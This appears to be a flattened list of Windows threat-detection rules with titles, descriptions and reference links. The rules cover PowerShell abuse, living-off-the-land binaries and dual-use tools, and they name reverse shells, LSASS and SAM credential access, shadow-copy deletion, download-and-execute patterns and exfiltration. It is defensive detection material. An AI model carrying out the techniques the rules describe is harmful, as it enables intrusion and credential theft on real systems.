https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a, https://learn.microsoft.com/en-us/powershell/module/pki/export-pfxcertificate?view=windowsserver2022-ps, https://www.splunk.com/en_us/blog/security/breaking-the-chain-defending-against-certificate-services-abuse.html |
Base64 Encoded PowerShell Command Detected |
Detects usage of the "FromBase64String" function in the commandline which is used to decode a base64 encoded string |
https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639 |
Suspicious FromBase64String Usage On Gzip Archive - Process Creation |
Detects attempts of decoding a base64 Gzip archive via PowerShell. This technique is often used as a method to load malicious content into memory afterward. |
https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=43 |
PowerShell Get-Process LSASS |
Detects a "Get-Process" cmdlet and its aliases targeting the lsass process, which is in almost all cases a sign of malicious activity |
https://web.archive.org/web/20220205033028/https://twitter.com/PythonResponder/status/1385064506049630211 |
Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet |
Detects suspicious reconnaissance command line activity on Windows systems using the PowerShell Get-LocalGroupMember Cmdlet |
https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ |
PowerShell Get-Clipboard Cmdlet Via CLI |
Detects usage of the 'Get-Clipboard' cmdlet via CLI |
https://github.com/OTRF/detection-hackathon-apt29/issues/16, https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.md |
Abuse of Service Permissions to Hide Services Via Set-Service |
Detects usage of the "Set-Service" PowerShell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service", etc. (Works only in PowerShell 7) |
https://twitter.com/Alh4zr3d/status/1580925761996828672, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2 |
Suspicious PowerShell IEX Execution Patterns |
Detects suspicious ways to run Invoke-Expression using the IEX alias |
https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-expression?view=powershell-7.2, https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708 |
Root Certificate Installed From Susp Locations |
Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. |
https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/, https://learn.microsoft.com/en-us/powershell/module/pki/import-certificate?view=windowsserver2022-ps |
Import PowerShell Modules From Suspicious Directories - ProcCreation |
Detects powershell scripts that import modules from suspicious directories |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md |
Unsigned AppX Installation Attempt Using Add-AppxPackage |
Detects usage of "Add-AppxPackage" or its alias "Add-AppPackage" to install unsigned AppX packages |
https://learn.microsoft.com/en-us/windows/msix/package/unsigned-package, https://twitter.com/WindowsDocs/status/1620078135080325122 |
Suspicious PowerShell Invocations - Specific - ProcessCreation |
Detects suspicious PowerShell invocation command parameters |
Internal Research |
Suspicious Invoke-WebRequest Execution With DirectIP |
Detects calls to PowerShell with Invoke-WebRequest cmdlet using direct IP access |
https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software |
Suspicious Invoke-WebRequest Execution |
Detects a suspicious call to the Invoke-WebRequest cmdlet where the output is written to a suspicious location |
https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/ |
Suspicious PowerShell Mailbox Export to Share |
Detects usage of the PowerShell New-MailboxExportRequest cmdlet to export a mailbox to a remote or local share, as used in ProxyShell exploitations |
https://youtu.be/5mqid-7zp8k?t=2481, https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html, https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1, https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/ |
Malicious PowerShell Commandlets - ProcessCreation |
Detects Commandlet names from well-known PowerShell exploitation frameworks |
https://adsecurity.org/?p=2921, https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries, https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1, https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1, https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1, https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1, https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/, https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/, https://github.com/calebstewart/CVE-2021-1675, https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1, https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html, https://github.com/HarmJ0y/DAMP, https://github.com/samratashok/nishang, https://github.com/DarkCoderSc/PowerRunAsSystem/, https://github.com/besimorhino/powercat, https://github.com/Kevin-Robertson/Powermad, https://github.com/adrecon/ADRecon, https://github.com/adrecon/AzureADRecon |
MSExchange Transport Agent Installation |
Detects the installation of an Exchange Transport Agent |
https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=7 |
Non Interactive PowerShell Process Spawned |
Detects non-interactive PowerShell activity by looking at the "powershell" process with a non-user GUI process such as "explorer.exe" as a parent. |
https://web.archive.org/web/20200925032237/https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190410151110.html |
Potential PowerShell Obfuscation Via WCHAR |
Detects suspicious encoded character syntax often used for defense evasion |
https://twitter.com/0gtweet/status/1281103918693482496 |
Execution of Powershell Script in Public Folder |
This rule detects execution of PowerShell scripts located in the "C:\Users\Public" folder |
https://www.mandiant.com/resources/evolution-of-fin7 |
Tamper Windows Defender Remove-MpPreference |
Detects attempts to remove Windows Defender configurations using the 'MpPreference' cmdlet |
https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088 |
RemoteFXvGPUDisablement Abuse Via AtomicTestHarnesses |
Detects calls to the AtomicTestHarnesses "Invoke-ATHRemoteFXvGPUDisablementCommand" which is designed to abuse the "RemoteFXvGPUDisablement.exe" binary to run custom PowerShell code via module load-order hijacking. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md, https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1 |
Potential Powershell ReverseShell Connection |
Detects usage of the "TcpClient" class. Which can be abused to establish remote connections and reverse-shells. As seen used by the Nishang "Invoke-PowerShellTcpOneLine" reverse shell and other. |
https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/, https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/, https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Shells/Invoke-PowerShellTcpOneLine.ps1 |
Run PowerShell Script from ADS |
Detects PowerShell script execution from Alternate Data Stream (ADS) |
https://github.com/p0shkatz/Get-ADS/blob/1c3a3562e713c254edce1995a7d9879c687c7473/Get-ADS.ps1 |
Run PowerShell Script from Redirected Input Stream |
Detects PowerShell script execution via input stream redirect |
https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Powershell.yml, https://twitter.com/Moriarty_Meng/status/984380793383370752 |
PowerShell SAM Copy |
Detects suspicious PowerShell scripts accessing SAM hives |
https://twitter.com/splinter_code/status/1420546784250769408 |
Suspicious Service DACL Modification Via Set-Service Cmdlet |
Detects suspicious DACL modifications via the "Set-Service" cmdlet using the "SecurityDescriptorSddl" flag (only available with PowerShell 7) that can be used to hide services or make them unstoppable |
https://www.sans.org/blog/red-team-tactics-hiding-windows-services/, https://learn.microsoft.com/pt-br/windows/win32/secauthz/sid-strings |
Suspicious PowerShell Invocation From Script Engines |
Detects suspicious powershell invocations from interpreters or unusual programs |
https://www.securitynewspaper.com/2017/03/20/attackers-leverage-excel-powershell-dns-latest-non-malware-attack/ |
PowerShell Set-Acl On Windows Folder |
Detects PowerShell scripts to set the ACL to a file in the Windows folder |
https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-acl?view=powershell-5.1, https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1505.005/T1505.005.md |
Change PowerShell Policies to an Insecure Level |
Detects changing the PowerShell script execution policy to a potentially insecure level using the "-ExecutionPolicy" flag. |
https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.4, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.4, https://adsecurity.org/?p=2604, https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/ |
PowerShell Script Change Permission Via Set-Acl |
Detects PowerShell execution to set the ACL of a file or a folder |
https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-acl?view=powershell-5.1, https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1505.005/T1505.005.md |
Service StartupType Change Via PowerShell Set-Service |
Detects the use of the PowerShell "Set-Service" cmdlet to change the startup type of a service to "disabled" or "manual" |
https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955 |
Deletion of Volume Shadow Copies via WMI with PowerShell |
Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell, https://www.elastic.co/guide/en/security/current/volume-shadow-copy-deletion-via-powershell.html |
Exchange PowerShell Snap-Ins Usage |
Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27 |
https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/, https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/, https://www.intrinsec.com/apt27-analysis/ |
Stop Windows Service Via PowerShell Stop-Service |
Detects the stopping of a Windows service via the PowerShell Cmdlet "Stop-Service" |
https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/stop-service?view=powershell-7.4 |
Suspicious PowerShell Download and Execute Pattern |
Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive) |
https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70, https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html |
Suspicious PowerShell Parameter Substring |
Detects suspicious PowerShell invocation with a parameter substring |
http://www.danielbohannon.com/blog-1/2017/3/12/powershell-execution-argument-obfuscation-how-it-can-make-detection-easier |
Suspicious PowerShell Parent Process |
Detects suspicious or uncommon parent processes of PowerShell |
https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=26 |
PowerShell Script Run in AppData |
Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder |
https://twitter.com/JohnLaTwC/status/1082851155481288706, https://app.any.run/tasks/f87f1c4e-47e2-4c46-9cf4-31454c06ce03 |
Powershell Token Obfuscation - Process Creation |
Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation |
https://github.com/danielbohannon/Invoke-Obfuscation |
PowerShell DownloadFile |
Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line |
https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html |
User Discovery And Export Via Get-ADUser Cmdlet |
Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file |
http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html, https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/ |
Net WebClient Casing Anomalies |
Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques |
https://app.any.run/tasks/b9040c63-c140-479b-ad59-f1bb56ce7a97/ |
Suspicious X509Enrollment - Process Creation |
Detects use of X509Enrollment |
https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=42, https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=41, https://learn.microsoft.com/en-us/dotnet/api/microsoft.hpc.scheduler.store.cx509enrollmentwebclassfactoryclass?view=hpc-sdk-5.1.6115 |
Suspicious XOR Encoded PowerShell Command |
Detects presence of a potentially xor encoded powershell command |
https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65, https://redcanary.com/blog/yellow-cockatoo/, https://zero2auto.com/2020/05/19/netwalker-re/, https://mez0.cc/posts/cobaltstrike-powershell-exec/ |
Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet |
Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration.
An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md, https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a |
Arbitrary File Download Via PresentationHost.EXE |
Detects usage of "PresentationHost" which is a utility that runs ".xbap" (Browser Applications) files to download arbitrary files |
https://github.com/LOLBAS-Project/LOLBAS/pull/239/files |
XBAP Execution From Uncommon Locations Via PresentationHost.EXE |
Detects the execution of ".xbap" (Browser Applications) files via PresentationHost.EXE from an uncommon location. These files can be abused to run malicious ".xbap" files and bypass AWL
|
https://lolbas-project.github.io/lolbas/Binaries/Presentationhost/ |
Visual Studio NodejsTools PressAnyKey Arbitrary Binary Execution |
Detects child processes of Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary |
https://twitter.com/mrd0x/status/1463526834918854661, https://gist.github.com/nasbench/a989ce64cefa8081bd50cf6ad8c491b5 |
Abusing Print Executable |
Attackers can use print.exe for remote file copy |
https://lolbas-project.github.io/lolbas/Binaries/Print/, https://twitter.com/Oddvarmoe/status/985518877076541440 |
File Download Using ProtocolHandler.exe |
Detects usage of "ProtocolHandler" to download files. Downloaded files will be located in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md, https://lolbas-project.github.io/lolbas/OtherMSBinaries/ProtocolHandler/ |
Suspicious Provlaunch.EXE Child Process |
Detects suspicious child processes of "provlaunch.exe" which might indicate potential abuse for proxy execution. |
https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/, https://twitter.com/0gtweet/status/1674399582162153472 |
Potential Provlaunch.EXE Binary Proxy Execution Abuse |
Detects child processes of "provlaunch.exe" which might indicate potential abuse for proxy execution. |
https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/, https://twitter.com/0gtweet/status/1674399582162153472 |
Screen Capture Activity Via Psr.EXE |
Detects execution of Windows Problem Steps Recorder (psr.exe), a utility used to record the user screen and clicks. |
https://lolbas-project.github.io/lolbas/Binaries/Psr/, https://web.archive.org/web/20200229201156/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1493861893.pdf, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md |
PUA - 3Proxy Execution |
Detects the use of 3proxy, a tiny free proxy server |
https://github.com/3proxy/3proxy, https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html |
PUA - AdFind Suspicious Execution |
Detects AdFind execution with common flags seen used during attacks |
https://www.joeware.net/freetools/tools/adfind/, https://thedfirreport.com/2020/05/08/adfind-recon/, https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/, https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/, https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx, https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md, https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1087.002/T1087.002.md#atomic-test-7---adfind---enumerate-active-directory-user-objects |
PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE |
Detects active directory enumeration activity using known AdFind CLI flags |
https://www.joeware.net/freetools/tools/adfind/, https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.002/T1087.002.md |
PUA - AdvancedRun Execution |
Detects the execution of AdvancedRun utility |
https://twitter.com/splinter_code/status/1483815103279603714, https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3, https://www.elastic.co/security-labs/operation-bleeding-bear, https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/ |
PUA - AdvancedRun Suspicious Execution |
Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts |
https://twitter.com/splinter_code/status/1483815103279603714, https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3, https://www.elastic.co/security-labs/operation-bleeding-bear, https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/ |
PUA - Advanced IP Scanner Execution |
Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups. |
https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/, https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html, https://labs.f-secure.com/blog/prelude-to-ransomware-systembc, https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf, https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer, https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/Advanced%20IP%20Scanner |
PUA - Advanced Port Scanner Execution |
Detects the use of Advanced Port Scanner. |
https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/Advanced%20Port%20Scanner |
PUA - Chisel Tunneling Tool Execution |
Detects usage of the Chisel tunneling tool via the commandline arguments |
https://github.com/jpillora/chisel/, https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/, https://blog.sekoia.io/lucky-mouse-incident-response-to-detection-engineering/ |
PUA - CleanWipe Execution |
Detects the use of CleanWipe, a tool usually used to remove Symantec antivirus. |
https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/CleanWipe |
PUA - Crassus Execution |
Detects Crassus, a Windows privilege escalation discovery tool, based on PE metadata characteristics. |
https://github.com/vu-ls/Crassus |
PUA - CsExec Execution |
Detects the use of the lesser-known remote execution tool named CsExec, a PsExec alternative |
https://github.com/malcomvetter/CSExec, https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/ |
PUA - DIT Snapshot Viewer |
Detects the use of the Ditsnap tool, an inspection tool for the Active Directory database, ntds.dit. |
https://thedfirreport.com/2020/06/21/snatch-ransomware/, https://web.archive.org/web/20201124182207/https://github.com/yosqueoy/ditsnap |
PUA - DefenderCheck Execution |
Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion. |
https://github.com/matterpreter/DefenderCheck |
PUA - Fast Reverse Proxy (FRP) Execution |
Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet. |
https://asec.ahnlab.com/en/38156/, https://github.com/fatedier/frp |
PUA - IOX Tunneling Tool Execution |
Detects the use of IOX - a tool for port forwarding and intranet proxy purposes |
https://github.com/EddieIvan01/iox |
PUA - Mouse Lock Execution |
In Kaspersky's 2020 Incident Response Analyst Report they listed legitimate tool "Mouse Lock" as being used for both credential access and collection in security incidents. |
https://github.com/klsecservices/Publications/blob/657deb6a6eb6e00669afd40173f425fb49682eaa/Incident-Response-Analyst-Report-2020.pdf, https://sourceforge.net/projects/mouselock/ |
PUA - Netcat Suspicious Execution |
Detects execution of Netcat. Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network |
https://nmap.org/ncat/, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md, https://www.revshells.com/ |
PUA - SoftPerfect Netscan Execution |
Detects usage of SoftPerfect's "netscan.exe", an application for scanning networks.
It is actively used in the wild by threat actors to inspect and understand the network architecture of a victim.
|
https://www.protect.airbus.com/blog/uncovering-cyber-intruders-netscan/, https://secjoes-reports.s3.eu-central-1.amazonaws.com/Sockbot%2Bin%2BGoLand.pdf, https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/, https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/yanluowang-ransomware-attacks-continue, https://research.nccgroup.com/2022/07/13/climbing-mount-everest-black-byte-bytes-back/, https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-hive-ransomware/, https://www.softperfect.com/products/networkscanner/ |
PUA - Ngrok Execution |
Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available.
Involved domains are bin.equinox.io for download and *.ngrok.io for connections.
|
https://ngrok.com/docs, https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html, https://stackoverflow.com/questions/42442320/ssh-tunnel-to-ngrok-and-initiate-rdp, https://www.virustotal.com/gui/file/58d21840d915aaf4040ceb89522396124c82f325282f805d1085527e1e2ccfa1/detection, https://cybleinc.com/2021/02/15/ngrok-platform-abused-by-hackers-to-deliver-a-new-wave-of-phishing-attacks/, https://twitter.com/xorJosh/status/1598646907802451969, https://www.softwaretestinghelp.com/how-to-use-ngrok/ |
PUA - Nimgrab Execution |
Detects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files. |
https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md |
PUA - NirCmd Execution |
Detects the use of NirCmd tool for command execution, which could be the result of legitimate administrative activity |
https://www.nirsoft.net/utils/nircmd.html, https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/, https://www.nirsoft.net/utils/nircmd2.html#using |
PUA - NirCmd Execution As LOCAL SYSTEM |
Detects the use of NirCmd tool for command execution as SYSTEM user |
https://www.nirsoft.net/utils/nircmd.html, https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/, https://www.nirsoft.net/utils/nircmd2.html#using |
PUA - Nmap/Zenmap Execution |
Detects usage of nmap/zenmap. Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation |
https://nmap.org/, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-3---port-scan-nmap-for-windows |
PUA - NPS Tunneling Tool Execution |
Detects the use of NPS, a port forwarding and intranet penetration proxy server |
https://github.com/ehang-io/nps |
PUA - NSudo Execution |
Detects the use of NSudo tool for command execution |
https://web.archive.org/web/20221019044836/https://nsudo.m2team.org/en-us/, https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/ |
PUA - PingCastle Execution |
Detects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level. |
https://github.com/vletoux/pingcastle, https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/, https://github.com/fengjixuchui/Start-ADEnum/blob/e237a739db98b6104427d833004836507da36a58/Functions/Start-ADEnum.ps1#L450, https://github.com/lkys37en/Start-ADEnum/blob/5b42c54215fe5f57fc59abc52c20487d15764005/Functions/Start-ADEnum.ps1#L680, https://github.com/projectHULK/AD_Recon/blob/dde2daba9b3393a9388cbebda87068972cc0bd3b/SecurityAssessment.ps1#L2699, https://github.com/802-1x/Compliance/blob/2e53df8b6e89686a0b91116b3f42c8f717dca820/Ping%20Castle/Get-PingCastle-HTMLComplianceReport.ps1#L8, https://github.com/EvotecIT/TheDashboard/blob/481a9ce8f82f2fd55fe65220ee6486bae6df0c9d/Examples/RunReports/PingCastle.ps1 |
PUA - PingCastle Execution From Potentially Suspicious Parent |
Detects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level, via a script located in a potentially suspicious or uncommon location.
|
https://github.com/vletoux/pingcastle, https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/, https://github.com/fengjixuchui/Start-ADEnum/blob/e237a739db98b6104427d833004836507da36a58/Functions/Start-ADEnum.ps1#L450, https://github.com/lkys37en/Start-ADEnum/blob/5b42c54215fe5f57fc59abc52c20487d15764005/Functions/Start-ADEnum.ps1#L680, https://github.com/projectHULK/AD_Recon/blob/dde2daba9b3393a9388cbebda87068972cc0bd3b/SecurityAssessment.ps1#L2699, https://github.com/802-1x/Compliance/blob/2e53df8b6e89686a0b91116b3f42c8f717dca820/Ping%20Castle/Get-PingCastle-HTMLComplianceReport.ps1#L8, https://github.com/EvotecIT/TheDashboard/blob/481a9ce8f82f2fd55fe65220ee6486bae6df0c9d/Examples/RunReports/PingCastle.ps1 |
PUA - Process Hacker Execution |
Detects the execution of Process Hacker based on binary metadata information (Image, Hash, Imphash, etc).
Process Hacker is a tool to view and manipulate processes, kernel options and other low level options.
Threat actors abused older vulnerable versions to manipulate system processes.
|
https://processhacker.sourceforge.io/, https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/ |
PUA - Radmin Viewer Utility Execution |
Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1072/T1072.md, https://www.radmin.fr/ |
PUA - Potential PE Metadata Tamper Using Rcedit |
Detects the use of rcedit to potentially alter executable PE metadata properties, which could conceal efforts to rename system utilities for defense evasion. |
https://security.stackexchange.com/questions/210843/is-it-possible-to-change-original-filename-of-an-exe, https://www.virustotal.com/gui/file/02e8e8c5d430d8b768980f517b62d7792d690982b9ba0f7e04163cbc1a6e7915, https://github.com/electron/rcedit |
PUA - Rclone Execution |
Detects execution of the RClone utility for exfiltration as used by various ransomware strains like REvil, Conti, FiveHands, etc. |
https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/, https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware, https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a, https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone, https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html |
PUA - RunXCmd Execution |
Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts |
https://www.d7xtech.com/free-software/runx/, https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/ |
PUA - Seatbelt Execution |
Detects the execution of the PUA/Recon tool Seatbelt via PE information or command line parameters |
https://github.com/GhostPack/Seatbelt, https://www.bluetangle.dev/2022/08/fastening-seatbelt-on-threat-hunting.html |
PUA - System Informer Execution |
Detects the execution of System Informer, a task manager tool to view and manipulate processes, kernel options and other low level operations |
https://github.com/winsiderss/systeminformer |
PUA - WebBrowserPassView Execution |
Detects the execution of WebBrowserPassView.exe, a password recovery tool that reveals the passwords stored by the following web browsers: Internet Explorer (Version 4.0 - 11.0), Mozilla Firefox (All Versions), Google Chrome, Safari, and Opera |
https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1555.003/T1555.003.md |
PUA - Wsudo Suspicious Execution |
Detects usage of wsudo (Windows Sudo Utility), a tool that lets the user execute programs with different permissions (System, Trusted Installer, Administrator, etc.) |
https://github.com/M2Team/Privexec/ |
PUA - Adidnsdump Execution |
Detects the use of adidnsdump, a tool that enables enumeration and export of all DNS records in the zone for reconnaissance of internal networks. Python 3 and python.exe must be installed.
Used to query/modify DNS records for Active Directory-integrated DNS via LDAP
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md#atomic-test-9---remote-system-discovery---adidnsdump |
Python Inline Command Execution |
Detects execution of python using the "-c" flag. This could be used as a way to launch a reverse shell or execute live Python code. |
https://docs.python.org/3/using/cmdline.html#cmdoption-c, https://www.revshells.com/, https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet |
